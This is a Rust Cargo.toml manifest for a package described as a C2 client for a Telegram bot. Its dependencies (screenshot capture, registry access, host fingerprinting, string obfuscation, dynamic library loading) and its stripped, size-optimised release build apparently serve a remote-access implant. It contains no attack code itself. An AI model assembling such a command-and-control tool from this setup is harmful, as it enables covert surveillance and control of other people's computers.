[package]
name = "tgcc_client"
version = "0.1.3"
edition = "2024"
build = "build.rs"
description = "A C2 client for telegram bot by bamuwe"

[profile.release]
# 优化级别：z 表示优化大小，s 表示优化速度但保持较小体积
opt-level = "z"
# 启用链接时优化
lto = true
# 启用代码生成单元优化
codegen-units = 1
# 启用 panic 时直接终止程序而不是展开栈
panic = "abort"
# 启用 strip 符号表
strip = true
# 禁用调试信息
debug = false
# 启用增量编译（可选，如果不需要可以注释掉）
# incremental = false

[dependencies]
chrono = "0.4"
toml = "0.8"
serde = { version = "1.0", features = ["derive"] }
whoami = "1.4"
reqwest = { version = "0.11",features = ["multipart","json","stream", "native-tls"]}
tokio = { version = "1" ,features = ["full"] }
serde_json = "1.0"
base64 = "0.21"
winreg = "0.11"
sysinfo = "0.29"
mac_address="1.1.8"
directories = "5.0"
shell-words = "1.1"
once_cell = "1.18.0"
screenshots = "0.5.3"
regex = { version = "1.8"}
obfstr = "0.4.4"
libloading = "0.8.8"
winapi = "0.3.9"
encoding_rs = "0.8"
# ez-ffmpeg = { version = "0.5.3", features = ["static"] }
